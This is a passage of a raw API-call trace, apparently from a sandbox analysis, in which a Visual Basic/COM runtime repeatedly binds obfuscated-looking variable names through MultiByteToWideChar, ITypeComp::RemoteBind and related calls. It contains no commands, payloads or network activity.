[0069.885] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b82772, cbMultiByte=8, lpWideCharStr=0x144d40, cchWideChar=9 | out: lpWideCharStr="DQXGA_A") returned 8 [0069.885] ITypeComp:RemoteBind (in: This=0x665bd30, szName="DQXGA_A", lHashVal=0x107826, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.885] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="DQXGA_A") returned 0x107826 [0069.885] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x8, _Src="DQXGA_A" | out: _Dst="DQXGA_A") returned 0x0 [0069.885] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=8, lpWideCharStr=0x144af0, cchWideChar=8 | out: lpWideCharStr="DQXGA_A") returned 8 [0069.885] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="DQXGA_A", lHashVal=0x107826, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.885] IMalloc:Alloc (This=0x7fefec05380, cb=0xf) returned 0x68767a0 [0069.885] _mbscpy_s (in: _Dst=0x68767a0, _DstSizeInBytes=0x8, _Src=0x3b82772 | out: _Dst=0x68767a0) returned 0x0 [0069.885] strcpy_s (in: _Dst=0x144e50, _DstSize=0xf, _Src="_B_var_DQXGA_A" | out: _Dst="_B_var_DQXGA_A") returned 0x0 [0069.885] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=15, lpWideCharStr=0x144ca0, cchWideChar=15 | out: lpWideCharStr="_B_var_DQXGA_A") returned 15 [0069.885] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_DQXGA_A", lHashVal=0x106c29, wFlags=0x5, ppTInfo=0x144cb8, pDescKind=0x144ccc, ppFuncDesc=0x144cd0, ppVarDesc=0x44005f00720061, ppTypeComp=0x41004700000000, pDummy=0x0 | out: ppTInfo=0x144cb8*=0x0, pDescKind=0x144ccc*=0, ppFuncDesc=0x144cd0, ppVarDesc=0x44005f00720061, ppTypeComp=0x41004700000000, pDummy=0x0) returned 0x0 [0069.885] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x8, _Src=0x3b82772 | out: _Dst=0x144ec0) returned 0x0 [0069.885] ITypeComp:RemoteBind (in: This=0x665ba60, szName="jZCADD", lHashVal=0x10ee58, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.885] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b827c2, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="jZCADD") returned 7 [0069.885] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="jZCADD", lHashVal=0x10ee58, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.886] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b827c2, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="jZCADD") returned 7 [0069.886] ITypeComp:RemoteBind (in: This=0x665bd30, szName="jZCADD", lHashVal=0x10ee58, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.886] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="jZCADD") returned 0x10ee58 [0069.886] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x7, _Src="jZCADD" | out: _Dst="jZCADD") returned 0x0 [0069.886] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=7, lpWideCharStr=0x144af0, cchWideChar=7 | out: lpWideCharStr="jZCADD") returned 7 [0069.886] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="jZCADD", lHashVal=0x10ee58, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.886] IMalloc:Alloc (This=0x7fefec05380, cb=0xe) returned 0x68767a0 [0069.886] _mbscpy_s (in: _Dst=0x68767a0, _DstSizeInBytes=0x7, _Src=0x3b827c2 | out: _Dst=0x68767a0) returned 0x0 [0069.886] strcpy_s (in: _Dst=0x144e50, _DstSize=0xe, _Src="_B_var_jZCADD" | out: _Dst="_B_var_jZCADD") returned 0x0 [0069.886] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=14, lpWideCharStr=0x144ca0, cchWideChar=14 | out: lpWideCharStr="_B_var_jZCADD") returned 14 [0069.886] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_jZCADD", lHashVal=0x1068c2, wFlags=0x3, ppTInfo=0x144cb8, pDescKind=0x144ccc, ppFuncDesc=0x144cd0, ppVarDesc=0x6a005f00720061, ppTypeComp=0x44004100000000, pDummy=0x0 | out: ppTInfo=0x144cb8*=0x0, pDescKind=0x144ccc*=0, ppFuncDesc=0x144cd0, ppVarDesc=0x6a005f00720061, ppTypeComp=0x44004100000000, pDummy=0x0) returned 0x0 [0069.886] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x7, _Src=0x3b827c2 | out: _Dst=0x144ec0) returned 0x0 [0069.886] ITypeComp:RemoteBind (in: This=0x665ba60, szName="DAAGDA", lHashVal=0x10bb18, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.886] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b827ea, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="DAAGDA") returned 7 [0069.886] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="DAAGDA", lHashVal=0x10bb18, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.886] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b827ea, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="DAAGDA") returned 7 [0069.886] ITypeComp:RemoteBind (in: This=0x665bd30, szName="DAAGDA", lHashVal=0x10bb18, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.887] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="DAAGDA") returned 0x10bb18 [0069.887] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x7, _Src="DAAGDA" | out: _Dst="DAAGDA") returned 0x0 [0069.887] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=7, lpWideCharStr=0x144af0, cchWideChar=7 | out: lpWideCharStr="DAAGDA") returned 7 [0069.887] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="DAAGDA", lHashVal=0x10bb18, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.887] IMalloc:Alloc (This=0x7fefec05380, cb=0xe) returned 0x68767a0 [0069.887] _mbscpy_s (in: _Dst=0x68767a0, _DstSizeInBytes=0x7, _Src=0x3b827ea | out: _Dst=0x68767a0) returned 0x0 [0069.887] strcpy_s (in: _Dst=0x144e50, _DstSize=0xe, _Src="_B_var_DAAGDA" | out: _Dst="_B_var_DAAGDA") returned 0x0 [0069.887] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=14, lpWideCharStr=0x144ca0, cchWideChar=14 | out: lpWideCharStr="_B_var_DAAGDA") returned 14 [0069.887] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_DAAGDA", lHashVal=0x103582, wFlags=0x3, ppTInfo=0x144cb8, pDescKind=0x144ccc, ppFuncDesc=0x144cd0, ppVarDesc=0x44005f00720061, ppTypeComp=0x44004700000000, pDummy=0x0 | out: ppTInfo=0x144cb8*=0x0, pDescKind=0x144ccc*=0, ppFuncDesc=0x144cd0, ppVarDesc=0x44005f00720061, ppTypeComp=0x44004700000000, pDummy=0x0) returned 0x0 [0069.887] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x7, _Src=0x3b827ea | out: _Dst=0x144ec0) returned 0x0 [0069.887] ITypeComp:RemoteBind (in: This=0x665ba60, szName="SkXAAA4w", lHashVal=0x10e7d5, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.887] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b8283e, cbMultiByte=9, lpWideCharStr=0x144d40, cchWideChar=10 | out: lpWideCharStr="SkXAAA4w") returned 9 [0069.887] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="SkXAAA4w", lHashVal=0x10e7d5, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.887] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b8283e, cbMultiByte=9, lpWideCharStr=0x144d40, cchWideChar=10 | out: lpWideCharStr="SkXAAA4w") returned 9 [0069.887] ITypeComp:RemoteBind (in: This=0x665bd30, szName="SkXAAA4w", lHashVal=0x10e7d5, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.887] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="SkXAAA4w") returned 0x10e7d5 [0069.887] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x9, _Src="SkXAAA4w" | out: _Dst="SkXAAA4w") returned 0x0 [0069.887] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=9, lpWideCharStr=0x144af0, cchWideChar=9 | out: lpWideCharStr="SkXAAA4w") returned 9 [0069.888] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="SkXAAA4w", lHashVal=0x10e7d5, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.888] IMalloc:Alloc (This=0x7fefec05380, cb=0x10) returned 0x68767a0 [0069.888] _mbscpy_s (in: _Dst=0x68767a0, _DstSizeInBytes=0x9, _Src=0x3b8283e | out: _Dst=0x68767a0) returned 0x0 [0069.888] strcpy_s (in: _Dst=0x144e50, _DstSize=0x10, _Src="_B_var_SkXAAA4w" | out: _Dst="_B_var_SkXAAA4w") returned 0x0 [0069.888] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=16, lpWideCharStr=0x144ca0, cchWideChar=16 | out: lpWideCharStr="_B_var_SkXAAA4w") returned 16 [0069.888] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_SkXAAA4w", lHashVal=0x10bf5e, wFlags=0x3, ppTInfo=0x144cb8, pDescKind=0x144ccc, ppFuncDesc=0x144cd0, ppVarDesc=0x53005f00720061, ppTypeComp=0x41004100000000, pDummy=0x0 | out: ppTInfo=0x144cb8*=0x0, pDescKind=0x144ccc*=0, ppFuncDesc=0x144cd0, ppVarDesc=0x53005f00720061, ppTypeComp=0x41004100000000, pDummy=0x0) returned 0x0 [0069.888] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x9, _Src=0x3b8283e | out: _Dst=0x144ec0) returned 0x0 [0069.888] ITypeComp:RemoteBind (in: This=0x665ba60, szName="rU4DAQAU", lHashVal=0x1040d3, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.888] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b82812, cbMultiByte=9, lpWideCharStr=0x144d40, cchWideChar=10 | out: lpWideCharStr="rU4DAQAU") returned 9 [0069.888] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="rU4DAQAU", lHashVal=0x1040d3, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.888] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b82812, cbMultiByte=9, lpWideCharStr=0x144d40, cchWideChar=10 | out: lpWideCharStr="rU4DAQAU") returned 9 [0069.888] ITypeComp:RemoteBind (in: This=0x665bd30, szName="rU4DAQAU", lHashVal=0x1040d3, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.888] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="rU4DAQAU") returned 0x1040d3 [0069.888] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x9, _Src="rU4DAQAU" | out: _Dst="rU4DAQAU") returned 0x0 [0069.888] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=9, lpWideCharStr=0x144af0, cchWideChar=9 | out: lpWideCharStr="rU4DAQAU") returned 9 [0069.888] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="rU4DAQAU", lHashVal=0x1040d3, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.889] IMalloc:Alloc (This=0x7fefec05380, cb=0x10) returned 0x68767a0 [0069.889] _mbscpy_s (in: _Dst=0x68767a0, _DstSizeInBytes=0x9, _Src=0x3b82812 | out: _Dst=0x68767a0) returned 0x0 [0069.889] strcpy_s (in: _Dst=0x144e50, _DstSize=0x10, _Src="_B_var_rU4DAQAU" | out: _Dst="_B_var_rU4DAQAU") returned 0x0 [0069.889] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=16, lpWideCharStr=0x144ca0, cchWideChar=16 | out: lpWideCharStr="_B_var_rU4DAQAU") returned 16 [0069.889] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_rU4DAQAU", lHashVal=0x1008db, wFlags=0x5, ppTInfo=0x144cb8, pDescKind=0x144ccc, ppFuncDesc=0x144cd0, ppVarDesc=0x72005f00720061, ppTypeComp=0x41004400000000, pDummy=0x0 | out: ppTInfo=0x144cb8*=0x0, pDescKind=0x144ccc*=0, ppFuncDesc=0x144cd0, ppVarDesc=0x72005f00720061, ppTypeComp=0x41004400000000, pDummy=0x0) returned 0x0 [0069.889] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x9, _Src=0x3b82812 | out: _Dst=0x144ec0) returned 0x0 [0069.889] ITypeComp:RemoteBind (in: This=0x665ba60, szName="zBDcAD", lHashVal=0x107b55, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.889] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b82896, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="zBDcAD") returned 7 [0069.889] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="zBDcAD", lHashVal=0x107b55, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.889] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b82896, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="zBDcAD") returned 7 [0069.889] ITypeComp:RemoteBind (in: This=0x665bd30, szName="zBDcAD", lHashVal=0x107b55, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.889] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="zBDcAD") returned 0x107b55 [0069.889] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x7, _Src="zBDcAD" | out: _Dst="zBDcAD") returned 0x0 [0069.889] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=7, lpWideCharStr=0x144af0, cchWideChar=7 | out: lpWideCharStr="zBDcAD") returned 7 [0069.889] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="zBDcAD", lHashVal=0x107b55, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.889] IMalloc:Alloc (This=0x7fefec05380, cb=0xe) returned 0x68767a0 [0069.889] _mbscpy_s (in: _Dst=0x68767a0, _DstSizeInBytes=0x7, _Src=0x3b82896 | out: _Dst=0x68767a0) returned 0x0 [0069.890] strcpy_s (in: _Dst=0x144e50, _DstSize=0xe, _Src="_B_var_zBDcAD" | out: _Dst="_B_var_zBDcAD") returned 0x0 [0069.890] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=14, lpWideCharStr=0x144ca0, cchWideChar=14 | out: lpWideCharStr="_B_var_zBDcAD") returned 14 [0069.890] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_zBDcAD", lHashVal=0x10f5fe, wFlags=0x3, ppTInfo=0x144cb8, pDescKind=0x144ccc, ppFuncDesc=0x144cd0, ppVarDesc=0x7a005f00720061, ppTypeComp=0x41006300000000, pDummy=0x0 | out: ppTInfo=0x144cb8*=0x0, pDescKind=0x144ccc*=0, ppFuncDesc=0x144cd0, ppVarDesc=0x7a005f00720061, ppTypeComp=0x41006300000000, pDummy=0x0) returned 0x0 [0069.890] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x7, _Src=0x3b82896 | out: _Dst=0x144ec0) returned 0x0 [0069.890] ITypeComp:RemoteBind (in: This=0x665ba60, szName="VAAoX_QQ", lHashVal=0x10d390, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.890] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b828be, cbMultiByte=9, lpWideCharStr=0x144d40, cchWideChar=10 | out: lpWideCharStr="VAAoX_QQ") returned 9 [0069.890] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="VAAoX_QQ", lHashVal=0x10d390, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.890] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b828be, cbMultiByte=9, lpWideCharStr=0x144d40, cchWideChar=10 | out: lpWideCharStr="VAAoX_QQ") returned 9 [0069.890] ITypeComp:RemoteBind (in: This=0x665bd30, szName="VAAoX_QQ", lHashVal=0x10d390, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.890] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="VAAoX_QQ") returned 0x10d390 [0069.890] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x9, _Src="VAAoX_QQ" | out: _Dst="VAAoX_QQ") returned 0x0 [0069.890] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=9, lpWideCharStr=0x144af0, cchWideChar=9 | out: lpWideCharStr="VAAoX_QQ") returned 9 [0069.890] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="VAAoX_QQ", lHashVal=0x10d390, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.890] IMalloc:Alloc (This=0x7fefec05380, cb=0x10) returned 0x68767a0 [0069.890] _mbscpy_s (in: _Dst=0x68767a0, _DstSizeInBytes=0x9, _Src=0x3b828be | out: _Dst=0x68767a0) returned 0x0 [0069.891] strcpy_s (in: _Dst=0x144e50, _DstSize=0x10, _Src="_B_var_VAAoX_QQ" | out: _Dst="_B_var_VAAoX_QQ") returned 0x0 [0069.891] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=16, lpWideCharStr=0x144ca0, cchWideChar=16 | out: lpWideCharStr="_B_var_VAAoX_QQ") returned 16 [0069.891] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_VAAoX_QQ", lHashVal=0x10ab19, wFlags=0x3, ppTInfo=0x144cb8, pDescKind=0x144ccc, ppFuncDesc=0x144cd0, ppVarDesc=0x56005f00720061, ppTypeComp=0x58006f00000000, pDummy=0x0 | out: ppTInfo=0x144cb8*=0x0, pDescKind=0x144ccc*=0, ppFuncDesc=0x144cd0, ppVarDesc=0x56005f00720061, ppTypeComp=0x58006f00000000, pDummy=0x0) returned 0x0 [0069.891] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x9, _Src=0x3b828be | out: _Dst=0x144ec0) returned 0x0 [0069.891] ITypeComp:RemoteBind (in: This=0x665ba60, szName="mAUBGA4", lHashVal=0x10ccd0, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.891] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b828ea, cbMultiByte=8, lpWideCharStr=0x144d40, cchWideChar=9 | out: lpWideCharStr="mAUBGA4") returned 8 [0069.891] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="mAUBGA4", lHashVal=0x10ccd0, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.891] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b828ea, cbMultiByte=8, lpWideCharStr=0x144d40, cchWideChar=9 | out: lpWideCharStr="mAUBGA4") returned 8 [0069.891] ITypeComp:RemoteBind (in: This=0x665bd30, szName="mAUBGA4", lHashVal=0x10ccd0, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, 